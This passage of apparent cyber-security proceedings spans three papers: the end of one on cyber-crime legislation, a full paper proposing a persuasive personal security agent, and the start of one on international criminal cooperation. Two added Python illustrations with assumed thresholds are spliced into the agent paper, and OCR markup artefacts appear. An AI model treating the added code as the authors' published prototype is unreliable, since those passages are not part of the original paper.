Considering this rather gloomy background, how can we summarize the main legislative challenges to focus on?

Above all, the language used by modern technology has to be transcribed into proper legal language, and the adaptation of new legislation must cover as much as possible of cyberspace behaviour. A challenge in this context is the fact that technology is developing at a much faster pace than legislative processes. Consequently, threats originating in the widespread use of ICT systems evolve very fast, obstructing the parallel processes of adapting new legislation.

Furthermore, protection of digital information and the fight against so-called computer crime cannot be pursued without close international cooperation and global joint actions.

EU law, as well as national legislation in individual Member States, seems in principle to be sufficiently harmonized. Nonetheless, there are still areas where adopted solutions need to be changed or adjusted. It is also necessary to stress that while law harmonization within the EU is important, these efforts will have limited effect if further harmonization is not carried out on a global scale. Crimes committed in digital information networks, as we have seen, do not recognize any national borders.
It is also crucial that proper training is offered to personnel, particularly in the judiciary and to those involved in detecting, prosecuting and punishing violations of law in connection with computer use and ICT networks. Human resources occupied with modern technology crimes must have appropriate qualifications and access to the necessary equipment.

Noteworthy among the many detailed challenges is the question of the accountability of service administrators and, more precisely, the need to react swiftly in cases of violation of law in networks.

The discussion on blocking and eliminating Internet pages with illegal content is particularly animated. The discussion is not new. The questions raised concerning the lack of adequate efficiency of such procedures are of course legitimate. Nevertheless, this does not change the fact that blocking websites with illegal content is functioning in certain EU countries (in some as a consequence of adopted legislation, in others as a result of agreements between ISPs). In a situation where the majority of websites with illegal content are located on servers beyond the jurisdiction of EU Member States, this solution seems for the time being to be the most feasible way out.

User registration for pre-paid services also needs to be harmonized. Effective prosecution is hampered by the current fact that in some Member States such registration is compulsory, while in others this service remains totally anonymous.

Finally, another increasingly urgent issue to be raised is the need to regulate services which use cryptography, and in particular the question of admitting deciphering of transmission content in situations of legal interception of encrypted information.

The law, not for the first time in its long history, has to undergo adaptation to a changing environment, while maintaining the ability to foresee and forestall situations such as those created by the ongoing technological revolution.
References

Mejssner, B., 2007, Niezbite cyfrowe dowody [online], http://cio.cxo.pl/artykuly/55536/Niezbite.cyfro-we.dowody.html
Criteria for a Personal Information Security Agent

Ewald Stieger and Rossouw von Solms
Nelson Mandela Metropolitan University, Port Elizabeth, South Africa
s20631237@nmmu.ac.za
Rossouw.VonSolms@nmmu.ac.za

Abstract: Today's economy depends on the secure flow of information within and across organizations, and information security is an issue of vital importance. Information security ensures business continuity and minimizes business damage by preventing and reducing the impact of security incidents. However, information security efforts are certainly not as effective as one would have wished for. A commonly accepted reason for this is the insecure behaviour of people. This insecure behaviour is often due to a lack of knowledge, awareness, education and training. In order to address this, many organisations provide security education, training and awareness programs to their employees. However, these programs often do not achieve a persistent change towards secure behaviour. The various reasons that contribute to the failure of security education, training and awareness programs and cause the trend towards insecure behaviour are briefly discussed. It follows that changing the behaviour of people is an inherently difficult task that requires the consideration of many factors. Similarly, a tool that intends to address insecure behaviour needs to consider various technological elements that may contribute to its ability to influence behaviour. The aim of this paper is to propose the principles of a personal information security agent and to explore a set of objectives and criteria that may contribute to its success in influencing and reminding individuals towards more secure behaviour. The criteria stem from various domains such as persuasive technology and human computer interaction. Persuasive technology has been applied in various domains to shape, reinforce or change people's behaviour. We describe related work that has been done using persuasive technology, and build on it. The proposed criteria consist of functions such as "To motivate" and characteristics such as "Context sensitivity". To put the theory into practice, a prototype of a personal security agent has been developed that implements some of the criteria. Based on this, a discussion on the development and implementation of the prototype and its potential benefits has been included. The prototype was developed to test the proposed criteria in a practical experiment that will form part of future research.

Keywords: Information security, information security awareness, persuasive technology, human computer interaction, human behaviour
1. Introduction

Information security remains a major problem, in particular the human issue. The famous hacker Kevin Mitnick (Poulsen 2000) testified before the [US] Congress saying that "... the human side of computer security is easily exploited and constantly overlooked. Companies spend millions of dollars on firewalls, encryption and secure access devices, and it's money wasted, because none of these measures address the weakest link in the security chain."

The Ponemon Institute (2009) surveyed 967 end-users of corporate information technologies and found that there is an increasing trend in insecure behaviour amongst participants. For example, between 2007 and 2009 there was a 4% increase in the switching off of security-related software such as anti-virus. Threats also exhibit a similar increasing trend. The Sophos security threat report (Sophos 2011) measured a 10% increase in spam reports, a 13% increase in phishing and a 4% increase in malware between December 2009 and December 2010. Organisations also face threats, such as data leakage, from individuals who are not employees. These "external insiders" are introduced through trading partners or by outsourcing business processes. Most organisations address this by adding security clauses to their contracts and policies, but enforcing them remains a difficult task. This is often due to the fast pace of business or a lack of resources (Johnson and Goetz 2007). Furthermore, policies tend to be ignored. In the survey done by the Ponemon Institute (2009), 57% of respondents agreed that data security policies are largely ignored by employees and management. It is therefore essential that users of information (end-users) are made aware of threats and the risks that can be associated with them. The traditional way of achieving this is through security education, training and awareness (SETA) programs, which are typically offered by organisations. However, these programs are often not as successful as envisaged. The reasons that contribute to this include:
The programs are too generic and target too large an audience (Austen and Stewart 2008; Valent<strong>in</strong>e<br />
2006).<br />
Individuals attend<strong>in</strong>g the programs may believe the <strong>in</strong>formation given is not relevant to them<br />
(Valent<strong>in</strong>e 2006).<br />
Individuals forget the message that was given dur<strong>in</strong>g the program (Albrechtsen 2007).<br />
245
Ewald Stieger and Rossouw von Solms
Computer users have conflicting goals and relegate security to second place (Sasse, Brostoff and Weirich 2001; Whitten and Tygar 1999).
Computer users believe that there is no personal danger and they are not the target (Beautement and Sasse 2009; Weirich and Sasse 2001; West 2008).
Computer users believe that hackers will always find a way in, even if one is behaving securely (Weirich and Sasse 2001).
Users who behave in a secure way are seen as ‘paranoid’ or ‘pedantic’, and even untrustworthy, by their colleagues (Sasse, Brostoff and Weirich 2001).
Users may have a poor mental model of security due to a lack of knowledge or the complexity of security systems (Adams and Sasse 1999; Chiasson, van Oorschot and Biddle 2006).

In view of the above, this paper proposes an additional approach using a personal (information) security agent. A personal security agent may be able to address some of the shortcomings of SETA programs by being context sensitive and providing individual feedback to the user. Just as the dashboard of a motor vehicle provides the driver with a range of important information at a glance, a personal security agent could provide the user with a range of security information at a glance as well as relevant and immediate feedback. Security-related information in Windows 7 is provided in the form of the Action Center. Some of the items monitored by the Action Center include virus protection, spyware protection, user account control, and Windows updates. The Action Center monitors these security items and notifies users when changes occur. Upon clicking on the Action Center’s flag icon in the notification area, a list of issues to be addressed by the user is displayed. However, unless the user clicks the flag icon, he will not be reminded again of pending issues after a notification has been displayed. Also, due to improved customisability in Windows 7, a user can turn off these messages. This allows the user to become ignorant of relevant security issues. The Action Center also lacks an indication of the overall security status. Anti-virus software provides more specific security information that relates to viruses. Users are notified if threats are detected or when new virus definition updates are available. However, anti-virus software is only one component of security on a computer. The personal security agent will take a more holistic approach, including components such as security education as well. Therefore, the task of the personal security agent will be to provide individual and personal feedback regarding the overall security status, to influence the user towards secure behaviour and to reinforce it. The use of persuasive techniques may help to achieve this task. Persuasive technologies, or captology, were first proposed during CHI 1997, an ACM conference on human factors in computing systems (Fogg 1998). According to Fogg (2003), persuasive technology is defined as “interactive computing systems designed to change people’s attitudes and behaviours”. Weirich and Sasse (2001) are of the opinion that users cannot be forced to behave in a proper fashion, but an effort to persuade them to do so has to be made.

The rest of the paper, which will attempt to implement the aspects discussed above, is structured as follows. First, a brief discussion of related work is provided. Secondly, a list of objectives for a personal security agent is provided. Thirdly, an overview of the proposed criteria, which are divided into functions and characteristics, is provided. Finally, a prototype is presented and some concluding remarks regarding future research are given.
2. Related work

Persuasive technology has been applied successfully to domains such as health, safety and marketing. It was used to persuade people to consume less water at taps (Arroyo, Bonanni and Selker 2005), encourage physical activity (Consolvo et al. 2009) and healthy living (Del Valle and Opalach 2005), as well as influencing people to buy more at supermarkets (Cosley et al. 2003). Recent research done by Yeo, Rahim and Ren (2009) also applied persuasive principles in the field of information security. Their research tested the effectiveness of a web-based program in order to change the attitudes of end users towards information security awareness. The program used two persuasive strategies, “tunnelling” and “influencing through language”, and focussed on e-mail management, password management and virus protection. It was found that the program was able to positively change the attitudes of participating students towards information security aware behaviour. However, the program does not provide any feedback regarding the user’s current security context, nor does it perform any user activity monitoring. Further research done by Forget, Chiasson and Biddle (2007) proposed a persuasive authentication framework. The framework is based on the following persuasive principles:

The Personalisation Principle: providing customised information offers a more personal experience, which could be more persuasive than generic information.
The Simplification Principle: tasks should be made as simple as possible.
The Monitoring Principle: when aware that they are being observed, users are more likely to perform the desired behaviour.
The Conditioning Principle: using various forms of reinforcement to help shape the desired behaviour or convert existing behaviours into habits.
The Social Interaction Principle: users are more likely to be persuaded by a system that appears to share similar attitudes, traits, and personality.

The persuasive authentication framework was developed to be an effective tool in educating users to create more secure passwords and therefore does not consider other security issues. However, Forget, Chiasson and Biddle (2007) are of the opinion that their framework can also be utilised to educate users about security certificates, phishing, encryption, malware, and many other security issues.
3. Objectives

By taking the above into account, one can conclude that the main goal of the personal security agent is to influence users towards more secure behaviour. In order to achieve this, the personal security agent should:

Provide the user with an indication of his/her security status.
Be context sensitive by monitoring user actions and alerting the user immediately when a performed action has negatively influenced his/her security status.
Enable, influence and persuade the user to improve his/her security status.
Be easy to use and not frustrate the user.
Not be easily disabled.
Be configurable to some extent, because users may have different security needs.
Be able to report certain users that continuously do not follow security practices.
Educate the user regarding relevant security items.
4. Criteria of a personal security agent

This section will propose a set of criteria that may enable the personal security agent to achieve the above objectives. The criteria have been divided into functions and characteristics for a personal security agent.

4.1 Functions

This section will discuss the most important functions of the proposed personal security agent.

4.1.1 To persuade

Fogg (1998) has synthesised various definitions to define persuasion as “an attempt to shape, reinforce, or change behaviors, feelings, or thoughts about an issue, object, or action.” Therefore, the personal security agent will persuade users towards more secure behaviour. Research done by Oinas-Kukkonen and Harjumaa (2009) has led them to develop a framework for designing and evaluating persuasive systems. The framework describes various persuasive techniques, of which the following are relevant to the personal security agent and can support its persuasive abilities:

Reduction: Refers to reducing complex behaviour into simple tasks.
Tunnelling: Guiding users through a process or experience.
Self-monitoring: Refers to a system that keeps track of one’s own performance or status and supports the user in achieving goals.
Praise: By offering praise, a system can make users more open to persuasion.
Rewards: Systems that reward target behaviours may have great persuasive powers.
Surface credibility: A look and feel that conveys credibility.
Reminders: Reminding users regarding their security status and behaviour.
Liking: A system that is visually attractive for its users is likely to be more persuasive.
Social comparison: System users will have a greater motivation to perform the target behaviour if they can compare their performance with the performance of others.

In addition to the above, the conditioning and monitoring principles described in section 2 may provide additional support. According to Forget, Chiasson and Biddle (2007), persuasive technology must be applied with great care, because there is always a risk of annoying users to the point that they rebel against the system. Furthermore, Berdichevsky and Neuenschwander (1999) state that there are also ethical considerations to be taken into account, the most important being that the creators of a persuasive technology should never try to persuade users of something when they would not consent to be persuaded of it.
4.1.2 To motivate

The personal security agent needs to motivate secure behaviour. Users can be motivated in various ways. A well-known motivation strategy is to provide a reward or incentive. Rewards can be used as an effective means for cultivating interest and increasing motivation and performance (Cameron and Pierce 2002) and can be tangible or intangible. Furthermore, the use of rewards is individual: what may work as reinforcement for one person may not work for another. However, motivation can also occur through fear. Rogers’ protection motivation theory (Rogers 1983) concerns itself with the use of fear appeals to change the behaviour of people. It states that fear appeals will be effective if they convince the recipient that:

The problem is serious;
It may affect him/her;
It can be avoided by taking appropriate action; and
The recipient is capable of performing the necessary behaviour required to avoid the problem.

Motivation may also benefit from the competitive nature of people. According to Cheng (2004), competition and recognition can be used to motivate people's behaviours, since most people desire to win in contests and hope to obtain the glory as a kind of validation from others.
4.1.3 To escalate

The personal security agent needs to be able to escalate bad or inappropriate security behaviour. This escalation may occur in two ways:

By reinforcing security principles through repeating them in persuasive messages more often.
By bringing the particular user to the attention of an information security officer.

However, before any escalation takes place, the personal security agent will have provided the user with information regarding his/her behaviour as well as advice on how and why he/she needs to change behaviour. Escalation should take place only if the user constantly disregards this information.

4.1.4 To educate

The personal security agent will provide the users with information on ways to improve their security status. Information will be provided on what influences their security status, why it affects the security status, and how to improve the security status. Information regarding common threats and how they manifest themselves should also be given. Users that are more knowledgeable regarding threats and information security will be less likely to make wrong decisions.

Based on the above functions, the personal security agent will use persuasive principles, motivation and education to influence user behaviour. For example, a user may be praised for maintaining a good security status, motivated by comparing his/her security status to that of other users, and educated that his/her password should not only consist of letters. Also, users that exhibit continuous insecure behaviour may need to be reported so that further action can be taken.
4.2 Characteristics

This section describes the possible characteristics of the personal security agent.
4.2.1 Usability and interface design

Usability may be defined as the ease of use of a specific technology, how effective the technology is in meeting the user’s needs and the satisfaction of the user with the results obtained by using the technology to perform specific tasks (Johnson 2006). A research area that explores human computer interaction (HCI) in computer security is security HCI (HCI-S). Security HCI has been defined by Johnston, Eloff and Labuschagne (2003) as “the part of a UI which is responsible for establishing the common ground between a user and the security features of a system. HCI-S is human computer interaction applied in the area of computer security”. Furthermore, they mention that poor usability design in security systems or features often creates an aversion amongst users. This results in security being ignored and not used. Since the personal security agent may be regarded as a security feature, it will adapt the design criteria proposed by Johnston, Eloff and Labuschagne (2003). These criteria facilitate developing usable interfaces that are used in a security environment and are based on Nielsen’s (2005) heuristics traditionally used for heuristic evaluation:

Visibility of system status: The user interface (UI) must inform the user about the internal state of the system; for example, a message could indicate that a security feature is active.
Aesthetic and minimalist design: Only security information relevant to the user should be displayed. The security UI must be simple and easy to use, maintaining a minimalist design.
Satisfaction: The security activities must be easy to realize and understand.
Convey features: The UI needs to convey the available security features to the user clearly and appropriately; a good way to do it is by using figures or pictures.
Learning ability: The UI needs to be as non-threatening and easy to learn as possible.
4.2.2 Context sensitivity

According to Zurko (2005), security mechanisms that cannot be understood cannot be effective. Users need to understand how to use the security controls that are directly relevant to their task and context. Users can complete a task but are likely to make the wrong decision if they do not know the security implications it has. The personal security agent will continuously check for changes that affect the security status of a user. A detected change and the influence that it has on the user’s security status will be reported through a rapid feedback cycle:

The user performs a security-related action.
The personal security agent detects a change in the user’s security context.
An evaluation of the change occurs.
The user is provided with feedback regarding the action that he/she performed.

This can be considered as just-in-time persuasion. Just-in-time persuasion can be very effective, since the feedback is highly related and available at just the moment people make a decision (Cheng 2004).
4.2.3 Information

Since the personal security agent will continuously check for changes that affect the security status of a computer user, it will need information to determine whether a particular change is positive or negative. This decision support information may be based on an information security baseline for computer users in general or a policy such as an organization’s computer usage policy. Also, users in different roles may have different security requirements. For example, a home user may not have to secure his/her computer to the same degree as an investment portfolio manager in the finance department. Therefore, the personal security agent needs to be configurable to some extent.

4.2.4 Persistency

In order to provide the user with continuous feedback, the personal security agent must be “always on”. It should also not be easily deactivated or switched off by a user, since this would defeat its purpose.
4.2.5 Evolving

The “threat landscape” is constantly changing. New threats occur on a daily basis and stealing information has become big business. For the year 2010, more than 20 million new strains of malware were identified (PandaLabs 2010). Furthermore, information thieves are becoming more sophisticated by the day and have formed groups and alliances to target users. Some of the changes that can be identified are as follows:

There is a transition from email towards more immediate methods such as instant messaging and Twitter. Instant messaging and social media connections will replace email as the primary distribution method for malicious code and links (McAfee 2011).
There is an increasing number of cyber-protests or “hacktivism”. More people voluntarily allow their computer to participate in defacement and denial of service attacks to demonstrate their political and social views (McAfee 2011; PandaLabs 2010).
Attack toolkits, such as Zeus, are becoming more user-friendly and accessible to novices (McAfee 2011; Symantec 2010). In addition to this, a mobile version of Zeus has been discovered (Lennon 2010).

The personal security agent can therefore not remain stagnant and has to adapt and evolve in tandem with the threats that are out there.

By using principles of security HCI, it may be ensured that the personal security agent is user friendly. For example, the visibility principle may be realised in the form of a gauge that indicates the security status using colours such as red, yellow and green. Context sensitivity will allow the personal security agent to be persuasive the moment the user performs an insecure action. Furthermore, the information will enable it to make decisions regarding user behaviour. The information may be regarded as a monitoring configuration and should be adjustable by an authorised person. By being persistent, the personal security agent will be able to monitor the user’s actions and will ensure that it cannot be deactivated easily. Finally, being able to evolve will allow it to keep up with the changing “threat landscape” and to be a step ahead.

This section discussed the functions and characteristics of the proposed personal security agent. The functions defined what the personal security agent should be able to do and the characteristics defined its attributes. The criteria, consisting of functions and characteristics, can be studied through the development of a prototype. The next section provides a discussion of such a prototype.
5. Developments

Taking all the criteria discussed above into account, a prototype of a personal security agent has been developed using C# as a programming language and Windows Presentation Foundation (WPF) for the front end design. Figure 1 below shows a screenshot of the prototype.

Figure 1: A prototype of a personal security agent
The prototype interacts similarly to a chat-based program by automatically sliding in and out of view from the bottom right of the taskbar. It is designed to persuade the user more often when his/her overall security status, as indicated by the dial in the top right, is in the red zone than when it is in the green zone. Furthermore, if a change in the security status occurs, the user will be notified of the change and its cause. The overall security status is determined from the various status items indicated below “status detail”. These items include, for example, whether the antivirus program is updated or the firewall is enabled. For each item the user can obtain additional information regarding why it is important and how to fix it. The status items may differ based on the user’s context, as discussed in section 4.2.3.
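The rapid feedback cycle of section 4.2.2, the role-dependent baseline of section 4.2.3, the escalation rule of section 4.1.3 and the overall status derived from individual status items described above, brought together in one added Python example. This is not the authors' C# prototype: the two roles, the status item names, the advice texts, the green/yellow/red thresholds and the escalation threshold are all assumptions made for the illustration.

```python
"""Added illustration of a personal security agent's rapid feedback cycle.

This is not the authors' C# prototype: the roles, status items, advice texts,
the colour thresholds and the escalation threshold are all assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Role-specific baseline: the status items each role must keep in order (assumed policy).
ROLE_BASELINES: Dict[str, List[str]] = {
    "home_user": ["antivirus_updated", "firewall_enabled"],
    "finance_manager": ["antivirus_updated", "firewall_enabled",
                        "disk_encrypted", "updates_installed"],
}

# Educational text per item: why it matters and how to fix it (constructed).
ITEM_ADVICE: Dict[str, Tuple[str, str]] = {
    "antivirus_updated": ("Out-of-date signatures miss current malware.",
                          "Open the antivirus program and run an update."),
    "firewall_enabled": ("A disabled firewall exposes services to the network.",
                         "Turn the firewall on in the system settings."),
    "disk_encrypted": ("An unencrypted disk leaks data if the laptop is lost.",
                       "Enable full-disk encryption."),
    "updates_installed": ("Unpatched software is exploited by known attacks.",
                          "Install the pending system updates."),
}


def failing_items(items: Dict[str, bool], role: str) -> List[str]:
    """Required items of this role that are currently not in order."""
    return [name for name in ROLE_BASELINES[role] if not items.get(name, False)]


def overall_status(items: Dict[str, bool], role: str) -> str:
    """Dial colour: green = all in order, yellow = one item failing, red = more."""
    failing = len(failing_items(items, role))
    if failing == 0:
        return "green"
    return "yellow" if failing == 1 else "red"


@dataclass
class PersonalSecurityAgent:
    role: str
    escalation_threshold: int = 3   # ignored reminders before escalation (assumed)
    items: Dict[str, bool] = field(default_factory=dict)
    status: Optional[str] = None
    disregarded: int = 0            # consecutive cycles in which advice was ignored

    def reminder_interval_minutes(self) -> int:
        """Reminders come more often the longer advice is ignored (60 min base, assumed)."""
        return max(5, 60 // (2 ** self.disregarded))

    def observe(self, new_items: Dict[str, bool]) -> List[str]:
        """One feedback cycle: detect a change, evaluate it, return feedback messages."""
        if self.status is None:                     # first observation: report the baseline
            self.items = dict(new_items)
            self.status = overall_status(self.items, self.role)
            return [f"Security status: {self.status}"] + [
                f"Warning: {name} is not in order. {ITEM_ADVICE[name][0]} {ITEM_ADVICE[name][1]}"
                for name in failing_items(self.items, self.role)]

        required = ROLE_BASELINES[self.role]
        changed = {name: ok for name, ok in new_items.items()
                   if name in required and self.items.get(name, False) != ok}
        self.items = dict(new_items)
        before, after = self.status, overall_status(self.items, self.role)
        self.status = after

        feedback = []
        for name, ok in sorted(changed.items()):
            why, how = ITEM_ADVICE[name]
            if ok:    # praise reinforces the secure behaviour
                feedback.append(f"Well done: {name} is back in order.")
            else:     # immediate, context-sensitive warning with the why and the how
                feedback.append(f"Warning: {name} is no longer in order. {why} {how}")
        if before != after:
            feedback.append(f"Your security status changed from {before} to {after}.")

        if after == "green" or any(changed.values()):
            self.disregarded = 0                    # the user acted on the advice
        elif not changed:                           # nothing fixed since the last cycle
            self.disregarded += 1
            feedback.append("Reminder: still to fix: "
                            + ", ".join(failing_items(self.items, self.role)))
        if self.disregarded >= self.escalation_threshold:
            feedback.append("Escalation: repeated disregard reported to the "
                            "information security officer.")
        return feedback


if __name__ == "__main__":
    agent = PersonalSecurityAgent(role="finance_manager", escalation_threshold=2)
    ok = {name: True for name in ROLE_BASELINES["finance_manager"]}
    for snapshot in (ok, dict(ok, firewall_enabled=False), dict(ok, firewall_enabled=False),
                     dict(ok, firewall_enabled=False), ok):
        for line in agent.observe(snapshot):
            print(line)
```

Each call to observe() is one turn of the feedback cycle: the snapshot of status items is compared with the previous one, only items required by the user's role baseline count, and the feedback for a failing item carries both the why and the how, as section 4.1.4 asks. The reminder interval halves with every ignored cycle, and an escalation message is emitted only after repeated disregard, so the first warning never escalates on its own.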
The latest security-related news is displayed using a Really Simple Syndication (RSS) feed. This allows the user to be aware of the latest threats and security issues out there. The news may also motivate the user to behave more securely. An educational aspect is added in the form of random cyber-threats being displayed and allowing the user to view information regarding them. Additionally, the construction of strong passwords may be considered one of the cornerstones of information security. This prompted the idea to add a password strength tester to the prototype. The tester indicates the strength with a bar that changes colour from red (very weak) to green (very strong) as the password is typed. The password strength is determined using an algorithm that considers factors such as length, use of upper and lower case, and use of numbers and symbols, amongst others. Finally, the prototype also keeps track of the number of days the user is secure or insecure as well as the longest secure period.
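The password strength tester described above, as an added Python example that is not the authors' C# code: it scores a password from the factors the paragraph names (length, use of upper and lower case, numbers and symbols), maps the score onto the red-to-green bar, and shows how the bar colour changes as the password is typed. The point weights, the repeated-character penalty standing in for the paragraph's "amongst others", and the intermediate colour bands are assumptions.

```python
"""Added password strength meter in the spirit of the prototype's tester.

Not the authors' code: the point weights, the repeated-character penalty
and the colour bands below are assumptions.
"""
import string
from typing import List, Tuple


def password_score(password: str) -> int:
    """Score 0-100 from length, character classes and a repetition penalty."""
    score = min(len(password), 16) * 3           # length: 3 points per char, max 48
    classes = [
        any(c.islower() for c in password),      # lower case
        any(c.isupper() for c in password),      # upper case
        any(c.isdigit() for c in password),      # numbers
        any(c in string.punctuation for c in password),  # symbols
    ]
    score += 10 * sum(classes)                   # 10 points per class present
    if all(classes) and len(password) >= 12:
        score += 12                              # long and varied: bonus to reach 100
    if password and len(set(password)) < len(password) / 2:
        score -= 20                              # mostly repeated characters (assumed penalty)
    return max(0, min(100, score))


# Upper bound (exclusive), label, bar colour. Red and green come from the paper;
# the three intermediate bands are assumptions.
BANDS = [
    (20, "very weak", "red"),
    (40, "weak", "orange"),
    (60, "fair", "yellow"),
    (80, "strong", "light green"),
    (101, "very strong", "green"),
]


def strength_label(score: int) -> Tuple[str, str]:
    """Map a 0-100 score to the (label, colour) shown on the bar."""
    for upper, label, colour in BANDS:
        if score < upper:
            return label, colour
    raise ValueError(f"score out of range: {score}")


def meter_as_typed(password: str) -> List[str]:
    """Bar colour after each keystroke, as the user types the password."""
    return [strength_label(password_score(password[:i]))[1]
            for i in range(1, len(password) + 1)]


if __name__ == "__main__":
    for candidate in ("password", "aaaaaaaa", "Tr0ub4dor&3", "Correct-Horse-Battery-9"):
        score = password_score(candidate)
        print(f"{candidate!r}: {score} -> {strength_label(score)}")
    print(meter_as_typed("Ab1!"))
```

Running the block shows that an all-lowercase dictionary word stays orange, that repeating one character drops the bar to red despite adequate length, and that a long passphrase mixing all four classes fills the bar to green; meter_as_typed() gives the colour sequence a user would see keystroke by keystroke.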
6. Benefits

For companies and individuals there are many negative consequences, such as negative publicity, competitive disadvantage, identity theft, loss of information and customer confidence, as well as financial loss, that can be associated with insecure user behaviour. Therefore, a personal security agent that positively influences users towards more secure behaviour would be beneficial. Furthermore, a Gartner analyst report estimated that in less than a decade, organizations will typically deal with 30 times more information than they do today (Johnson 2006). This suggests an increase in related security breaches and a need to find solutions for insecure behaviour.
7. Conclusions

Influencing users towards secure behaviour is a difficult task, and this is often the reason why information security is not as successful as it could be. Threats follow an increasing trend and a new approach to combating insecure behaviour needs to be found. This paper has therefore proposed the approach of using a personal security agent: an “interactive security dashboard” that persuades users to be more secure. For the personal security agent a set of criteria was proposed, consisting of functions and characteristics that may enable it to achieve its goal. The criteria are not set in stone and need to be tested. Therefore, to apply the theory in practice, a prototype has been developed to test some of the proposed criteria. Future research will include testing the prototype to obtain feedback regarding the proposed criteria, which may then be revised accordingly. In addition, the results may indicate an effective strategy that a personal security agent can follow in order to influence a user towards more secure behaviour. Finally, the outcome of the research will be a framework that can be used to develop personal security agents. This framework may then be used to develop personal security agents that influence users towards more secure behaviour and assist them in securing their systems.
References

Adams, A. and Sasse, M. (1999) “Users are not the enemy”, Communications of the ACM, Vol 42, pp 41-46.
Albrechtsen, E. (2007) “A qualitative study of users' view on information security”, Computers & Security, Vol 26, pp 276-289.
Austen, J. and Stewart, G. (2008) “Maximising the Effectiveness of Information Security Awareness”, 2008 Royal Holloway Series, [online], http://media.techtarget.com/searchSecurityUK/downloads/RHUL_Stewart_FINALFINAL.pdf.
Arroyo, E., Bonanni, L. and Selker, T. (2005) “Waterbot: exploring feedback and persuasive techniques at the sink”, In: Proceedings of the SIGCHI conference on Human factors in computing systems, 2005, pp 639.
Beautement, A. and Sasse, A. (2009) “The economics of user effort in information security”, Computer Fraud & Security, Vol 2009, pp 8-12.
Berdichevsky, D. and Neuenschwander, E. (1999) “Toward an Ethics of Persuasive Technology”, Communications of the ACM, Vol 42, No 5, pp 51-58.
Cameron, J. and Pierce, W. (2002) Rewards and intrinsic motivation, Bergin & Garvey, Westport, Conn.
Cheng, R. (2004) “Persuasion strategies for computers as persuasive technologies”, [online], Department of Computer Science, University of Saskatchewan, http://homepage.usask.ca/rac740/file/paper811.pdf.
251
Ewald Stieger and Rossouw von Solms
International Criminal Cooperation in the Context of Cyber Incidents

Anna-Maria Talihärm
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
anna-maria.taliharm@ccdcoe.org
Abstract: The borderless and increasingly sophisticated nature of cyber crime calls for effective and timely responses from numerous stakeholders worldwide, including law enforcement agencies, international organisations, Computer Emergency Response Teams and Internet Service Providers. Therefore, the role of international criminal cooperation in the context of cyber incidents is becoming increasingly crucial. Cyberspace has challenged the fundamental principle of territorial jurisdiction and thus places an even greater burden on successful cross-border cooperation. Above and beyond the technical concerns of poor attacker attribution and the difficulties of acquiring digital evidence, some of the primary international legal obstacles include the lack of requisite procedural rules, determining jurisdiction and finding effective means of communication. Moreover, a cyber incident is not always recognised as a crime by both the victim nation and the nation from which the attack originated. It is therefore clear that a thorough review of substantive and procedural law should be undertaken at the national level before international cooperation can be effective, or even possible. This paper focuses on offences against data, property and infrastructure and draws attention to the most relevant international instruments employed in prosecuting cyber crime. According to the firm belief of legal experts working in the area, awareness of such international instruments as well as guidance toward proper implementation are immediately required. Hence, this paper offers a brief introduction to the main challenges of judicial cooperation in the field of cyber crime and, looking toward the future, describes important trends in the domain of international criminal cooperation.

Keywords: cyber crime, international criminal cooperation, judicial cooperation, information exchange
1. Introduction

Recent years have witnessed cyber incidents affecting businesses, government institutions, non-governmental entities and individuals becoming a daily nuisance. While large-scale cyber incidents such as Estonia 2007 or Georgia 2008 have raised the question of the application of the Law of Armed Conflict, and have in general served as a wake-up call to introduce or strengthen information security regulations (Tikk, Kaska, Vihul 2009), for the majority of the cases commonly referred to as “cyber attacks”, criminal law is the most efficient tool to deal with them (Kaska, Talihärm, Tikk 2010).

Besides national criminal law, the role of international criminal cooperation in the context of cyber incidents has proved to be crucial, as the borderless nature of cyber crime requires effective and timely responses from numerous stakeholders worldwide (Blomfield 2007). Despite the sceptics’ view that cyber cases are often “non-solvable” by nature, efficient international judicial cooperation in criminal matters has proved to be the facilitator of a successful outcome of the criminal procedure.

Building on these assumptions, this article focuses on international cooperation in investigating and prosecuting cyber crime. On the one hand, focusing on acts of cyber crime such as offences against data, property and infrastructure might seem an unnecessary limitation of the analysis of the domain of international criminal cooperation. On the other hand, it is precisely through a comprehensive overview of the most relevant international instruments employed in prosecuting cyber crimes that it becomes possible to identify the unique elements of such cooperation, the prevalent challenges and appropriate counterparts.

Instead of focusing in great detail on any of the particular challenges related to criminal cooperation in the context of cyber crime, this article serves as an introductory account of the domain and draws attention to major international instruments as well as related burning issues. After discussing the main challenges of cyber crime prosecution, the article identifies important trends in the area of international criminal cooperation.
2. Conditions for effective international cooperation in the cyber context

Broadly defined, an efficient legislative response to cyber crime encompasses three fields. Firstly, domestic substantive criminal law defines the prohibited and punishable cyber activities, i.e. it criminalises certain conduct in cyberspace. In addition, in case a cyber attack is targeted against the information infrastructure of another country, the domestic Penal Code is supplemented by legal requirements for e.g. retaining network traffic logs, electronic communications service providers’ duty to cooperate, etc., that all have an impact not only on the results of investigations, but are in a way also the basis for the overall defence of the nation under attack.
Secondly, domestic criminal procedure law gives the law enforcement and criminal justice system the necessary tools and means to investigate, prosecute and adjudicate the activities defined by substantive criminal law as cyber crimes. In general, law enforcement activities can be divided into two main groups: investigation of the offences and prosecution of the perpetrators (Walden 2006). Appropriate institutional arrangements for the smooth functioning of law enforcement agencies and their organisational structure may have a critical influence on effective law enforcement strategies (Walden 2006), whereas it is important to underline that law enforcement structures as such differ around the world and their functioning is in most cases based on individual policies.

Thirdly, besides the harmonisation of domestic legislation, drafting provisions and establishing institutions for police and judicial cooperation, a framework for international cooperation includes concluding relevant multi- or bilateral agreements or joining the existing ones (United Nations 1994). Currently, it can be observed that national legal standards regarding substantive and procedural rules are to some extent lacking harmonisation. For example, the Council of Europe’s study on the cooperation between law enforcement agencies and Internet Service Providers (ISPs) concluded that the relationship is short of even the “clarity on the very concept of cooperation” (CoE 2008). Naturally, uncertainties related to legal aspects and problems with the implementation of existing agreements do not benefit international cooperation either.

Furthermore, the domain of international criminal cooperation covers a great number of stakeholders as well as various fields of law. Organisations and states play a significant role in setting the stage and expressing political will in solving cases that require international cooperation in the investigative or prosecuting phases. Law enforcement agencies, usually public authorities such as investigation bodies, police and prosecuting authorities, have the primary competence in carrying out criminal procedures (Walden 2006).

